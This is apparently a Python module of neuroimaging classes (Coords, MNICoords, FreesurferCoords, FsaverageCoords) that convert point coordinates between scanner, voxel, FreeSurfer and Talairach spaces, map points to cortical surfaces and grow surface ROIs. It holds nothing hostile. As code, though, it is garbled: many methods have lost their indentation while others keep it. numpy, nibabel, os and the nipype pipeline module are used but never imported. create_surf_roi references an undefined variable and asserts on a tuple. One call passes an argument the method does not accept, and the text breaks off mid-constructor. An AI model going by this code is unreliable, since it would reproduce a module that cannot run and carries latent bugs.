from nipype.interfaces.fsl import WarpPoints, Reorient2Std, FLIRT,FNIRT
from nipype.interfaces.freesurfer import MRIConvert,Label2Label
import warnings
from mne.label import grow_labels
from .freesurfer_files import Surf, FreesurferSurf, Annot
from .image_manipulation import img2img_register, mri_label2vol, img2img_coord_register
from scipy.spatial.distance import cdist
import pandas as pd
import shutil
from nibabel.freesurfer import read_label
from mne import Label
from collections import defaultdict
#############################################################################################################################
# Coords class
#############################################################################################################################
class Coords(object):
    """General class to work with x,y,z point coordinates defined on an image volume.

    Keeps several representations of the same points (scanner RAS, voxel,
    freesurfer voxel and freesurfer tkr-RAS) in ``self.coordinates`` and lets
    arbitrary per-point "traits" (name, color, ...) be attached.
    """

    def __init__(self, coords, img_file, subject=None, coord_type='ras', working_dir=None, **traits):
        """ General class to work with coordinates

        Parameters
        -----------
        coords: numpy array
            x,y,z coordinates matrix (npoints x 3)
        img_file: str
            path to image file
        subject: str
            subject name
        coord_type: str, {'ras', 'voxel'}
            coordinate system of the input coords
        working_dir: str
            the path to working directory
        **traits: other traits of the coordinates;
             each trait's length should be equal to npoints;
             for instance, one can add "name" or "color" as extra traits for each coordinate

        Returns
        --------
        An object of Coords class
        """
        coords = np.atleast_2d(coords)
        self.img_file = img_file
        self.subject = subject
        self.coord_type = coord_type
        self.img = nib.load(img_file)
        self.working_dir = working_dir
        # affine transforms between voxel indices and scanner RAS coordinates
        self.vox2ras = self.img.affine
        self.ras2vox = np.linalg.inv(self.vox2ras)
        self.npoints = coords.shape[0]
        self.coordinates = {}
        affineM = self._to_affine_matrix(coords)
        self._count = 0  # iterator cursor used by __next__

        if coord_type == 'ras':
            self.coordinates['ras_coord'] = coords
            self.coordinates['voxel_coord'] = np.round(np.dot(self.ras2vox, affineM).T[:, :3])
        elif coord_type == 'voxel':
            self.coordinates['voxel_coord'] = coords
            self.coordinates['ras_coord'] = np.dot(self.vox2ras, affineM).T[:, :3]
        else:
            raise ValueError('type should be either "ras" or "voxel"')

        ### to freesurfer coords: run mri_convert in a uniquely named temp dir
        rnum1 = np.random.randint(10**15, 10**16)
        rnum2 = np.random.randint(10**10, 10**11)
        rnum = '{rnum1}_{rnum2}'.format(rnum1=rnum1, rnum2=rnum2)
        os.makedirs(os.path.join(os.path.abspath('.'), 'temp_{rnum}'.format(rnum=rnum)))
        wf_dir = os.path.join(os.path.abspath('.'), 'temp_{rnum}'.format(rnum=rnum))

        ## creating rawavg.mgz
        mc = MRIConvert()
        mc.inputs.in_file = img_file
        mc.inputs.out_file = os.path.join(wf_dir, 'rawavg.mgz')
        mc.inputs.out_type = 'mgz'
        mc.run()

        ## creating orig.mgz (conformed volume, as recon-all would produce)
        mc = MRIConvert()
        mc.inputs.in_file = os.path.join(wf_dir, 'rawavg.mgz')
        mc.inputs.out_file = os.path.join(wf_dir, 'orig.mgz')
        mc.inputs.out_type = 'mgz'
        mc.inputs.conform = True
        mc.run()

        rawavg_file = os.path.join(wf_dir, 'rawavg.mgz')
        orig_file = os.path.join(wf_dir, 'orig.mgz')

        ### read the freesurfer transforms from the conformed volume header
        orig_img = nib.freesurfer.load(orig_file)
        self.ras2fsvox = orig_img.header.get_ras2vox()
        self.fsvox2ras_tkr = orig_img.header.get_vox2ras_tkr()
        self.ras2ras_tkr = np.dot(self.fsvox2ras_tkr, self.ras2fsvox)

        ras_affineM = self._to_affine_matrix(self.coordinates['ras_coord'])
        self.coordinates['ras_tkr_coord'] = np.dot(self.fsvox2ras_tkr, np.dot(self.ras2fsvox, ras_affineM)).T[:, :3]
        self.coordinates['fsvoxel_coord'] = np.round(np.dot(self.ras2fsvox, ras_affineM).T[:, :3])

        # the temp dir is only needed to derive the transforms above
        shutil.rmtree(wf_dir)

        ### adding traits
        self.traits_list = []
        for trait in traits:
            self.add_trait(trait, traits[trait])

    def _to_affine_matrix(self, coords):
        """
        returns a 4 x npoints homogeneous-coordinate matrix for the specified coordinates
        """
        return np.hstack((coords, np.ones((coords.shape[0], 1)))).T

    def add_trait(self, trait, value):
        """
        Adds trait to the object

        Parameters:
        ------------
        trait: str
            name of trait such as "name" or "color" or "opacity" or "network" etc.
        value: list or array
            a list or array of values for the trait

        Examples:
        -----------
        coords = Coords(np.array([23,42,12],[12,45,12]),
                                 img_file = anat_img)
        coords.add_trait('name',['ldlpfc','lipl'])
        coords.add_trait('color',[(0,1,0),(1,0,0)])
        print('coordinates names: ', coords.name)
        print('coordinates colors: ', coords.color)
        """
        if type(value) != np.ndarray:
            try:
                value = np.atleast_1d(value)
            except Exception:
                # BUG FIX: the original built the ValueError without raising it,
                # silently swallowing the conversion failure.
                raise ValueError('{trait} should be numpy.ndarray!'.format(trait=trait))

        if value.shape[0] != self.npoints:
            raise ValueError('{trait} shape should be equal to number of points'.format(trait=trait))

        self.__setattr__(trait, value)
        if trait not in self.traits_list:
            self.traits_list.append(trait)

    def get_traits_dict(self):
        """
        return a dictionary of all the traits for the coordinates
        """
        traits = {}
        for trait in self.traits_list:
            traits[trait] = self.__getattribute__(trait)
        return traits

    def get_coords_df(self, coord_types='all', subset_by=None, subset_vals=None):
        """
        returns a dataframe of the different coordinate representations of the points
        (ras_coord, voxel_coord, ...), optionally restricted to a subset.
        """
        if coord_types == 'all':
            coord_types = self.coordinates.keys()

        if subset_by:
            targets = self.subset(subset_by, subset_vals)
        else:
            targets = self

        results = []
        for coord_type in coord_types:
            coords = targets.coordinates[coord_type]
            if hasattr(self, 'name'):
                coords_df = pd.DataFrame(coords, index=targets.name,
                                         columns=[coord_type + '_{axis}'.format(axis=a) for a in ['X', 'Y', 'Z']])
            else:
                # BUG FIX: build the fallback index from the (possibly subset)
                # targets, not from self, so the index length matches the data.
                coords_df = pd.DataFrame(coords,
                                         index=['coordinate_{i}'.format(i=i) for i in np.arange(targets.npoints)],
                                         columns=[coord_type + '_{axis}'.format(axis=a) for a in ['X', 'Y', 'Z']])
            results.append(coords_df)

        return pd.concat(results, axis=1)

    def map_to_surface(self, surface):
        """
        maps the points to a surface

        Parameters:
        -----------
        surface: an instance of Surf

        Returns:
        ----------
        A dictionary with the following keys:
            vertices: the vertices numbers
            ras_coord: the mapped ras coordinates
            ras_tkr_coord: the mapped ras tkr coordinates
        """
        if not isinstance(surface, Surf):
            # BUG FIX: the original raised a bare string, which itself raises
            # "TypeError: exceptions must derive from BaseException" in Python 3.
            raise TypeError("surface should be an instance of Surf")

        coords_ras_tkr = self.coordinates['ras_tkr_coord']
        # nearest surface vertex (Euclidean distance) for every point
        indices = np.argmin(cdist(surface.vertices, coords_ras_tkr), axis=0)
        mapped_coords_ras_tkr = surface.vertices[indices, :]
        mapped_coords_ras_tkr_affineM = np.hstack((mapped_coords_ras_tkr, np.ones((mapped_coords_ras_tkr.shape[0], 1))))
        mapped_coords_ras = np.dot(np.linalg.inv(self.ras2ras_tkr), mapped_coords_ras_tkr_affineM.T).T
        mapped_coords_ras = mapped_coords_ras[:, 0:3]
        results = {'vertices': indices, 'ras_coord': mapped_coords_ras, 'ras_tkr_coord': mapped_coords_ras_tkr}
        return results

    def img2imgcoord(self, ref_img, ref_name=None, method='linear', input_reorient2std=False, ref_reorient2std=False, wf_base_dir=None, wf_name='register',
                     linear_reg_file=None, warp_field_file=None, return_as_array=False):
        """
        registers the coordinates to another volume.

        Parameters:
        -----------
        ref_img: str
            path to reference image
        ref_name: str
            reference subject name
        method: str, {'linear', 'nonlinear'}
            FSL registration method (FLIRT for 'linear', FNIRT for 'nonlinear')
        input_reorient2std: boolean
            reorient the moving volume (img_file) to standard orientation (fslreorient2std)
        ref_reorient2std: boolean
            reorient the reference image to standard orientation (fslreorient2std)
        wf_base_dir: str
            base directory for results; falls back to working_dir, then to cwd
        wf_name: str
            workflow name; results are saved under <wf_base_dir>/<wf_name>
        linear_reg_file: str
            precomputed linear registration file, if available
        warp_field_file: str
            precomputed nonlinear warp field, if available
        return_as_array: boolean
            if True, return the new coordinates as a numpy array;
            otherwise return a Coords instance built on ref_img
        """
        ### resolve the working directory
        if wf_base_dir is None and self.working_dir is not None:
            wf_base_dir = self.working_dir
        elif wf_base_dir is None and self.working_dir is None:
            print('Working dir has not been specified, results will be stored in: ', os.path.abspath('.'))
            wf_base_dir = os.path.abspath('.')

        img_file = self.img_file
        ras_coords = self.coordinates['ras_coord']
        new_coords = img2img_coord_register(ras_coords, img_file, ref_img, wf_base_dir, method=method, input_reorient2std=input_reorient2std, ref_reorient2std=ref_reorient2std,
                                            wf_name=wf_name, linear_reg_file=linear_reg_file, warp_field_file=warp_field_file)

        if return_as_array is False:
            traits = {}
            for trait in self.traits_list:
                traits[trait] = self.__getattribute__(trait)
            new_coords = Coords(coords=new_coords, img_file=ref_img, subject=ref_name, **traits)

        return new_coords

    def subset(self, by, vals):
        """
        subsets the coordinates

        Parameters:
        -----------
        by: str
            which trait to use for subsetting, e.g. "name"
        vals: list
            which trait values to keep

        Returns:
        ---------
        A Coords object carrying all the traits of the selected points

        Examples:
        ---------
        coords = Coords(np.array([1,2,3],[3,4,5],[6,7,8]),img_file='anat.nii.gz',name=['c1','c2','c3'],network=['network1','network2','network1'])
        coords_sub = coords.subset('network',['network1'])
        """
        idx = []
        for val in vals:
            x = np.where(self.__getattribute__(by) == val)[0].tolist()
            idx.extend(x)
        idx = np.array(idx)

        coords = self.coordinates['ras_coord'][idx, :]
        traits = {}
        for trait in self.traits_list:
            traits[trait] = self.__getattribute__(trait)[idx]

        return Coords(coords, self.img_file, coord_type='ras', working_dir=self.working_dir, **traits)

    def __iter__(self):
        return self

    def __next__(self):
        # Yield one _Coord per point, then reset the cursor so the object
        # can be iterated again.
        if self._count >= self.npoints:
            self._count = 0
            raise StopIteration
        else:
            kwargs = {}
            for trait in self.traits_list:
                if hasattr(self, trait):
                    kwargs[trait] = self.__getattribute__(trait)[self._count]
            ras_coord = self.coordinates['ras_coord'][self._count, :]
            voxel_coord = self.coordinates['voxel_coord'][self._count, :]
            c = _Coord(ras_coord, voxel_coord, **kwargs)
            self._count += 1
            return c

    def __getitem__(self, idx):
        kwargs = {}
        for trait in self.traits_list:
            if hasattr(self, trait):
                # BUG FIX: index traits with the requested idx; the original
                # used the iterator cursor (self._count) here.
                kwargs[trait] = self.__getattribute__(trait)[idx]
        ras_coord = self.coordinates['ras_coord'][idx, :]
        voxel_coord = self.coordinates['voxel_coord'][idx, :]
        c = _Coord(ras_coord, voxel_coord, **kwargs)
        return c
class _Coord(object):
def __init__(self, ras_coord, voxel_coord, **kwargs):
self.ras_coord = ras_coord
self.voxel_coord = voxel_coord
self.traits_list = []
for trait,value in kwargs.items():
self.__setattr__(trait,value)
self.traits_list.append(trait)
#############################################################################################################################
# MNICoords class
#############################################################################################################################
class MNICoords(Coords):
    """Coordinates expressed in MNI space, anchored to an FSL MNI template volume."""

    def __init__(self, coords, mni_template='MNI152_T1_2mm.nii.gz', mni_directory=None):
        """
        Parameters
        ----------
        coords: numpy array
            x,y,z MNI coordinates (npoints x 3)
        mni_template: str
            file name of the MNI template inside mni_directory
        mni_directory: str
            directory holding the template; defaults to $FSLDIR
            (resolved lazily so importing this module does not require FSL)
        """
        if mni_directory is None:
            mni_directory = os.environ['FSLDIR']
        # BUG FIX: the original referenced the misspelled, undefined name
        # "mni_tmeplate", raising NameError on every instantiation.
        mni_file = os.path.join(mni_directory, mni_template)
        Coords.__init__(self, coords, mni_file)
#############################################################################################################################
# FreesurferCoords class
#############################################################################################################################
class FreesurferCoords(Coords):
    def __init__(self, coords, subject, freesurfer_dir, guess_hemi=True, working_dir=None, coord_type='ras', **traits):
        """
        Coords class when the freesurfer recon-all exists.

        Parameters:
        ----------
        coords: numpy array
            x,y,z coordinates (npoints x 3)
        subject: str
            subject name
        freesurfer_dir: str
            Freesurfer SUBJECTS_DIR
        guess_hemi: boolean
            for each coordinate, guesses hemisphere
        working_dir : str
            the directory where the results will be written to.
        coord_type: str, {'ras', 'voxel'}
            coordinate system of the input coords
        **traits:
            other traits for each coordinate such as "color" or "name"; look at the Coords class
        """
        self.freesurfer_dir = freesurfer_dir
        self.subject = subject
        self.working_dir = working_dir
        coords = np.atleast_2d(coords)
        self.coord_type = coord_type

        ## setting image file names (rawavg = native space, orig = conformed)
        rawavg_file = '{freesurfer_dir}/{subject}/mri/rawavg.mgz'.format(freesurfer_dir=freesurfer_dir,subject=subject)
        orig_file = '{freesurfer_dir}/{subject}/mri/orig.mgz'.format(freesurfer_dir=freesurfer_dir,subject=subject)
        self.img_file = rawavg_file

        ###
        self.img = nib.load(self.img_file)
        self.orig_img = nib.freesurfer.load(orig_file)

        ## transformations between native voxel/RAS and freesurfer voxel/tkr-RAS spaces
        self.vox2ras = self.img.affine
        self.ras2vox = np.linalg.inv(self.vox2ras)
        self.ras2fsvox = self.orig_img.header.get_ras2vox()
        self.fsvox2ras_tkr = self.orig_img.header.get_vox2ras_tkr()
        self.ras2ras_tkr = np.dot(self.fsvox2ras_tkr,self.ras2fsvox)

        ## populating coordinates in every representation
        self.npoints = coords.shape[0]
        self.coordinates = {}
        self._count=0
        affineM = self._to_affine_matrix(coords)

        if coord_type=='ras':
            self.coordinates['ras_coord'] = coords
            self.coordinates['voxel_coord'] = np.round(np.dot(self.ras2vox,affineM).T[:,:3])
        elif coord_type=='voxel':
            self.coordinates['voxel_coord'] = coords
            self.coordinates['ras_coord'] = np.dot(self.vox2ras,affineM).T[:,:3]
        else:
            raise ValueError('type should be either "ras" or "voxel"')

        ras_affineM = self._to_affine_matrix(self.coordinates['ras_coord'])
        self.coordinates['ras_tkr_coord'] = np.dot(self.fsvox2ras_tkr,np.dot(self.ras2fsvox, ras_affineM)).T[:,:3]
        self.coordinates['fsvoxel_coord'] = np.round(np.dot(self.ras2fsvox,ras_affineM).T[:,:3])
        self.coordinates['talairach_coord'] = self._get_talairach_coords()

        ## guessing hemisphere from the freesurfer voxel x coordinate
        if guess_hemi:
            self._guess_hemi()

        ## adding traits
        self.traits_list = []
        for trait in traits:
            self.add_trait(trait,traits[trait])
def _guess_hemi(self):
"""
uses Freesurfer voxel coordinate to guess hemisphere.
"""
self.hemi = []
self.hemi_not_determined = []
for s in np.arange(self.npoints):
if self.coordinates['fsvoxel_coord'][s,0]> 128:
self.hemi.append('lh')
elif self.coordinates['fsvoxel_coord'][s,0] < 128:
self.hemi.append('rh')
else:
w = """Could not determine hemiphere for point {x},{y},{z}. Right hemiphere has been chosen arbitrarily for this point.
Manually set the hemiphere for this point by calling set_hemi_manually!"""
w = w.format(x=self.coordinates['ras_coord'][s,0], y=self.coordinates['ras_coord'][s,1], z=self.coordinates['ras_coord'][s,2])
warnings.warn(w)
self.hemi_not_determined.append(s)
self.hemi.append('rh')
self.hemi = np.array(self.hemi)
def set_hemi_manually(self, n, hemi):
"""
sets hemisphere manually for point n
"""
self.hemi[n] = hemi
if n in self.hemi_not_determined:
self.hemi_not_determined.remove(n)
def _read_talaraich_transformation(self):
""" read talairach transformation from freesurfer talairach.xfm output"""
fname = '{freesurfer_dir}/{subject}/mri/transforms/talairach.xfm'.format(freesurfer_dir=self.freesurfer_dir,
subject=self.subject)
f = open(fname,'r').read().split('\n')
### cleaning rows of file
def clean_number(x):
if ';' in x:
return float(x[0:-1])
else:
return float(x)
rows = []
for i in [5,6,7]:
row = f[i].split(' ')
row = [clean_number(x) for x in row]
rows.append(row)
return np.array(rows)
def _get_talairach_coords(self):
""" transforms the coordinates by talairach transform matrix from freesurfer talairach.xfm"""
talairach_tr = self._read_talaraich_transformation()
return np.dot(talairach_tr,self._to_affine_matrix(self.coordinates['ras_coord'])).T[:,:3]
def map_to_annot(self, annot, map_surface='white', inplace=True):
""" map each point to specified annotation
Parameters:
-----------
annot: str
which annotation to use
map_surface: str, {'pial','white'}
the surface that points are projected into to get the vertices
Returns:
---------
structures: numpy array
a numpy array of structures ( annotations)
color: numpy array
a numpy array (npoints x 3) that specifies the color based on the annotation provided
"""
if len(self.hemi_not_determined)>0:
raise ValueError('Use set_hemi_manually to assign hemiphere to these points: %s'%(','.join(self.hemi_not_determined)))
lh_annot = Annot('lh', annot, self.subject, self.freesurfer_dir)
rh_annot = Annot('rh', annot, self.subject, self.freesurfer_dir)
colors = np.zeros((self.npoints,3))
structures = np.empty(self.npoints,dtype='object')
mapped_vertices_indices = self.map_to_surface(surface=map_surface)['vertices']
lh_mapped_vertices_indices = mapped_vertices_indices[self.hemi=='lh']
rh_mapped_vertices_indices = mapped_vertices_indices[self.hemi=='rh']
if np.sum(self.hemi=='lh')>0:
lh_colors, lh_structures = lh_annot.get_vertices_colors(lh_mapped_vertices_indices),lh_annot.get_vertices_names(lh_mapped_vertices_indices)
colors[self.hemi=='lh',:] = lh_colors
structures[self.hemi=='lh'] = ['lh_' + x.decode('UTF-8') for x in lh_structures]
if np.sum(self.hemi=='rh')>0:
rh_colors, rh_structures = rh_annot.get_vertices_colors(rh_mapped_vertices_indices),rh_annot.get_vertices_names(rh_mapped_vertices_indices)
colors[self.hemi=='rh',:] = rh_colors
structures[self.hemi=='rh'] = ['rh_' + x.decode('UTF-8') for x in rh_structures]
if inplace:
self.add_trait('color',colors)
self.add_trait('name', structures)
return structures, colors
def map_to_surface(self, surface='white'):
"""
maps the points to a surface ( either pial or white) or an instance of Surf class.
"""
if len(self.hemi_not_determined)>0:
raise ValueError('Use set_hemi_manually to assign hemiphere to these points: %s'%(','.join(self.hemi_not_determined)))
lh_coords_ras_tkr = self.coordinates['ras_tkr_coord'][self.hemi=='lh',:]
rh_coords_ras_tkr = self.coordinates['ras_tkr_coord'][self.hemi=='rh',:]
if surface in ['white','pial']:
lh_surf = FreesurferSurf('lh', surface,self.subject, self.freesurfer_dir)
rh_surf = FreesurferSurf('rh', surface, self.subject, self.freesurfer_dir)
lh_indices = np.argmin(cdist(lh_surf.vertices, lh_coords_ras_tkr), axis=0)
rh_indices = np.argmin(cdist(rh_surf.vertices, rh_coords_ras_tkr), axis=0)
lh_mapped_coords_ras_tkr= lh_surf.vertices[lh_indices,:]
rh_mapped_coords_ras_tkr= rh_surf.vertices[rh_indices,:]
elif isinstance(surface,Surf):
lh_indices = np.argmin(cdist(surface.vertices, lh_coords_ras_tkr), axis=0)
rh_indices = np.argmin(cdist(surface.vertices, rh_coords_ras_tkr), axis=0)
lh_mapped_coords_ras_tkr = surface.vertices[lh_indices,:]
rh_mapped_coords_ras_tkr = surface.vertices[rh_indices,:]
mapped_vertices = np.empty(self.npoints, dtype='int')
mapped_vertices[self.hemi=='lh']= lh_indices
mapped_vertices[self.hemi=='rh'] = rh_indices
mapped_coords_ras_tkr = np.zeros((self.npoints,3))
mapped_coords_ras_tkr[self.hemi=='lh',:] = lh_mapped_coords_ras_tkr
mapped_coords_ras_tkr[self.hemi=='rh',:] = rh_mapped_coords_ras_tkr
mapped_coords_ras_tkr_affineM = np.hstack((mapped_coords_ras_tkr,np.ones((mapped_coords_ras_tkr.shape[0],1))))
mapped_coords_ras = np.dot(np.linalg.inv(self.ras2ras_tkr),mapped_coords_ras_tkr_affineM.T).T
mapped_coords_ras = mapped_coords_ras[:,0:3]
results = {'vertices': mapped_vertices, 'ras_coord': mapped_coords_ras, 'ras_tkr_coord':mapped_coords_ras_tkr}
return results
def create_surf_roi(self, extents, surface='white', map_surface='white', map_to_annot=None, wf_base_dir=None,
wf_name='surf_roi', add_vertex_to_name=True):
""" creates surface ROIs for each coordinate point
Parameters
----------
extents: float or numpy array
specifies the raidus of the growing ROI. Either one single number for all the points or a numpy array containing
radius for each point
surface: str
specifies which surface to use for growing the ROIs ( white or pial)
map_to_annot: str
specifies which annotation to use to assign name and color to use for ROI labeling
wf_base_dir: str
workflow base dir
wf_name: str
workflow name , the results will be saved under <wf_base_dir>/<wf_name>
add_vertex_to_name: boolean
if True, adds the projected vertex number to the ROI name ( in case the ROIs might have similar naming, adding vertex number can help get rid of this issue)
Returns
-------
rois: instances of class of Label
rois_paths: path to the saved labels
"""
## wf_base_dir
if wf_base_dir is None and self.working_dir is not None:
wf_base_dir = self.working_dir
elif wf_base_dir is None and self.working_dir is None:
print('Working dir has not been specified, results will be stored in: ', os.path.abspath('.'))
wf_base_dir = os.path.abspath('.')
if len(self.hemi_not_determined)>0:
raise ValueError('Use set_hemi_manually to assign hemiphere to these points: %s'%(','.join(self.hemi_not_determined)))
results = self.map_to_surface(map_surface)
mapped_vertices, mapped_coords_ras_tkr, mapped_coords_ras = results['vertices'], results['ras_coord'], results['ras_tkr_coord']
### extents can be one number or an array, make it an array if it is a number
if type(extents)==list or type(extents)==np.ndarray:
assert(len(extents)==self.npoints,'extents can be either one number or a list where len(extents) is equal to number of points')
else:
extents = [extents]*self.npoints
hemi = [0 if hemi=='lh' else 1 for hemi in self.hemi]
rois = grow_labels(self.subject, mapped_vertices, extents, hemi, self.freesurfer_dir, surface=surface)
### get structures and color for labels according to annotation
if map_to_annot:
structures, colors = self.map_to_annot(annot, map_surface=map_surface)
for i in range(self.npoints):
rois[i].color = colors[i]
vertex = mapped_vertices[i]
if add_vertex_to_name:
rois[i].name = structures[i]+'_{r}mm_{surf}_{vertex}'.format(r=extents[i],surf=surface,vertex=vertex)
else:
rois[i].name = structures[i]+'_{r}mm_{surf}'.format(r=extents[i],surf=surface)
elif hasattr(self,'name') or hasattr(self,'color'):
for i in range(self.npoints):
if hasattr(self,'name'):
vertex = mapped_vertices[i]
if add_vertex_to_name:
rois[i].name = self.name[i]+'_{r}mm_{surf}_{vertex}'.format(r=extents[i],surf=surface,vertex=vertex)
else:
rois[i].name = self.name[i]+'_{r}mm_{surf}'.format(r=extents[i],surf=surface,vertex=vertex)
if hasattr(self,'color'):
rois[i].color = self.color[i]
else:
for i in range(self.npoints):
vertex = mapped_vertices[i]
if add_vertex_to_name:
rois[i].name = 'coor_id_{i}_{r}mm_{surf}_{vertex}'.format(r=extents[i],surf=surface,vertex=vertex,i=i)
else:
rois[i].name = 'coor_id_{i}_{r}mm_{surf}_{vertex}'.format(r=extents[i],surf=surface,vertex=vertex,i=i)
#### saving ROI labels
rois_path = []
if not os.path.exists(os.path.join(wf_base_dir,wf_name)):
os.makedirs(os.path.join(wf_base_dir,wf_name))
for i,roi in enumerate(rois):
os.environ['SUBJECTS_DIR'] = self.freesurfer_dir
### saving ROI label
roi_path = '{wf_base_dir}/{wf_name}/{roi_name}-{hemi}.label'.format(wf_base_dir=wf_base_dir, wf_name=wf_name, roi_name=roi.name, hemi=roi.hemi)
rois_path.append(roi_path)
roi.save(roi_path)
### converting list to arrays
self.add_trait('roi', np.array(rois))
return self.roi,rois_path
    def img2imgcoord(self, ref_img, ref_name=None, method='linear', input_reorient2std=True, ref_reorient2std=False, wf_base_dir = None, wf_name='register', linear_reg_file=None, warp_field_file = None, return_as_array=False):
        """Register the RAS coordinates to another volume.

        Same contract as Coords.img2imgcoord, but first converts freesurfer's
        rawavg.mgz to NIfTI (FSL-based registration expects NIfTI input) and
        then delegates to img2img_coord_register.
        """
        ## wf_base_dir: fall back to the instance working_dir, then to cwd
        if wf_base_dir is None and self.working_dir is not None:
            wf_base_dir = self.working_dir
        elif wf_base_dir is None and self.working_dir is None:
            print('Working dir has not been specified, results will be stored in: ', os.path.abspath('.'))
            wf_base_dir = os.path.abspath('.')

        ## converting rawavg to nifti
        mc = MRIConvert()
        mc.inputs.in_file = self.img_file
        mc.inputs.out_file = 'rawavg.nii.gz'
        mc.inputs.out_type = 'niigz'
        mc_node = pe.Node(mc,name='rawavg_to_nifti')
        wf = pe.Workflow(name=wf_name,base_dir=wf_base_dir)
        wf.add_nodes([mc_node])
        wf.run()

        ras_coords = self.coordinates['ras_coord']
        # register against the freshly converted NIfTI copy of rawavg
        new_coords = img2img_coord_register(ras_coords, os.path.join(wf_base_dir,wf_name,'rawavg_to_nifti','rawavg.nii.gz'), ref_img, wf_base_dir, method=method,
         input_reorient2std=input_reorient2std, ref_reorient2std=ref_reorient2std,
          wf_name=wf_name, linear_reg_file=linear_reg_file, warp_field_file = warp_field_file)

        if return_as_array is False:
            ## carry the traits over to the new Coords object
            traits={}
            for trait in self.traits_list:
                traits[trait] = self.__getattribute__(trait)
            new_coords = Coords(coords=new_coords, img_file=ref_img, subject=ref_name,**traits)

        return new_coords
def img2imgcoord_by_surf(self, target_subject, wf_base_dir=None, source_surface = 'pial', source_map_surface='pial', target_surface='pial'):
if wf_base_dir is None and self.working_dir is not None:
wf_base_dir = self.working_dir
elif wf_base_dir is None and self.working_dir is None:
print('Working dir has not been specified, results will be stored in: ', os.path.abspath('.'))
wf_base_dir = os.path.abspath('.')
rois,rois_paths = self.create_surf_roi(extents=2, wf_base_dir= wf_base_dir, wf_name='img2imgcoord_by_surf_roi', surface=source_surface, map_surface=source_map_surface, label2vol=False)
wf = pe.Workflow(name='label2label',base_dir=wf_base_dir)
for i in range(self.npoints):
l2l = Label2Label()
l2l.inputs.hemisphere = self.hemi[i]
l2l.inputs.subject_id = target_subject
l2l.inputs.sphere_reg = os.path.join(self.freesurfer_dir, target_subject, 'surf', self.hemi[i]+'.'+'sphere.reg')
l2l.inputs.white = os.path.join(self.freesurfer_dir, target_subject, 'surf', self.hemi[i]+'.'+'white')
l2l.inputs.source_subject = self.subject
l2l.inputs.source_label = rois_paths[i]
l2l.inputs.source_white = os.path.join(self.freesurfer_dir, self.subject, 'surf', self.hemi[i]+'.'+'white')
l2l.inputs.source_sphere_reg = os.path.join(self.freesurfer_dir, self.subject, 'surf', self.hemi[i]+'.'+'sphere.reg')
l2l.subjects_dir = self.freesurfer_dir
l2l_node = pe.Node(l2l,'label2label_{i}'.format(i=i))
wf.add_nodes([l2l_node])
try:
wf.run()
except RuntimeError:
pass
for i in range(self.npoints):
out_label_file = os.path.join(self.freesurfer_dir, target_subject, 'label', os.path.basename(rois_paths[i]).split('.label')[0]+'_converted'+'.label')
shutil.move(out_label_file, os.path.join(wf_base_dir, 'label2label','label2label_{i}'.format(i=i)))
new_coords = np.zeros((self.npoints,3))
for i in range(self.npoints):
label_file = os.path.join(wf_base_dir, 'label2label','label2label_{i}'.format(i=i),os.path.basename(rois_paths[i]).split('.label')[0]+'_converted'+'.label')
label_vertices = read_label(label_file)
label_vertices.sort()
label = Label(label_vertices,hemi=self.hemi[i],subject=target_subject)
vertex = label.center_of_mass()
targ_surf = FreesurferSurf(hemi=label.hemi, surf=target_surface, subject = target_subject, subjects_dir=self.freesurfer_dir)
new_coords[i,:] = targ_surf.get_coords(vertex)
return new_coords
    def __iter__(self):
        """Iterate over points as _FreesurferCoord records (see __next__)."""
        return self
    def __next__(self):
        """Return the next point as a _FreesurferCoord record.

        The cursor is reset to 0 just before StopIteration is raised, so the
        same object can be iterated more than once.
        """
        if self._count>=self.npoints:
            self._count = 0
            raise StopIteration
        else:
            # Gather the current point's value of every registered trait.
            kwargs = {}
            for trait in self.traits_list:
                if hasattr(self,trait):
                    kwargs[trait] = self.__getattribute__(trait)[self._count]
            t = _FreesurferCoord(ras_coord = self.coordinates['ras_coord'][self._count,:],
                                 voxel_coord = self.coordinates['voxel_coord'][self._count],
                                 ras_tkr_coord = self.coordinates['ras_tkr_coord'][self._count,:],
                                 fsvoxel_coord = self.coordinates['fsvoxel_coord'][self._count],
                                 talairach_coord = self.coordinates['talairach_coord'][self._count],
                                 hemi = self.hemi[self._count],
                                 **kwargs)
            self._count +=1
            return t
def __getitem__(self,idx):
kwargs = {}
for trait in self.traits_list:
if hasattr(self,trait):
kwargs[trait] = self.__getattribute__(trait)[idx]
t = _FreesurferCoord(ras_coord = self.coordinates['ras_coord'][idx,:],
voxel_coord = self.coordinates['voxel_coord'][idx],
ras_tkr_coord = self.coordinates['ras_tkr_coord'][idx,:],
fsvoxel_coord = self.coordinates['fsvoxel_coord'][idx],
talairach_coord = self.coordinates['talairach_coord'][idx],
hemi = self.hemi[idx],
**kwargs)
return t
def subset(self,by,vals):
idx = []
for val in vals:
x = np.where(self.__getattribute__(by)==val)[0].tolist()
idx.extend(x)
idx = np.array(idx)
coords = self.coordinates['ras_coord'][idx,:]
traits={}
for trait in self.traits_list:
traits[trait] = self.__getattribute__(trait)[idx]
return FreesurferCoords(coords, self.subject, self.freesurfer_dir, guess_hemi=True, working_dir=self.working_dir, **traits)
class FsaverageCoords(FreesurferCoords):
    def __init__(self, coords, subject='fsaverage', freesurfer_dir=None,
                 guess_hemi=True, working_dir=None, **traits):
        """
        This class implements methods to transform between coordinates in the
        Freesurfer fsaverage space.

        Parameters
        ==========
        coords: numpy array (n x 3). Coords are RAS coords defined in the native T1 space (rawavg).
        subject: Freesurfer subject ID
        freesurfer_dir: Freesurfer subjects directory.  Defaults to the
            SUBJECTS_DIR environment variable, read at call time.
        guess_hemi: uses Freesurfer processed volumes to guess which hemisphere each point belongs to.
        working_dir: directory used for intermediate workflow outputs.
        **traits: dictionary containing other traits
        """
        # FIX: the original evaluated os.environ['SUBJECTS_DIR'] in the
        # signature, which raises KeyError at *import* time whenever the
        # variable is unset — even for callers that pass freesurfer_dir
        # explicitly.  Resolve the default lazily instead.
        if freesurfer_dir is None:
            freesurfer_dir = os.environ['SUBJECTS_DIR']
        self.freesurfer_dir = freesurfer_dir
        self.subject = subject
        self.working_dir = working_dir
        coords = np.atleast_2d(coords)

        ## setting image file names
        orig_file = '{freesurfer_dir}/{subject}/mri/orig.mgz'.format(freesurfer_dir=freesurfer_dir,subject=subject)

        ## transformations
        self.orig_img = nib.freesurfer.load(orig_file)
        self.ras2fsvox = self.orig_img.header.get_ras2vox()
        self.fsvox2ras_tkr = self.orig_img.header.get_vox2ras_tkr()
        self.ras2ras_tkr = np.dot(self.fsvox2ras_tkr,self.ras2fsvox)

        ## populating coordinates
        self.npoints = coords.shape[0]
        self.coordinates = {}
        self.coordinates['ras_coord'] = coords
        self._count = 0
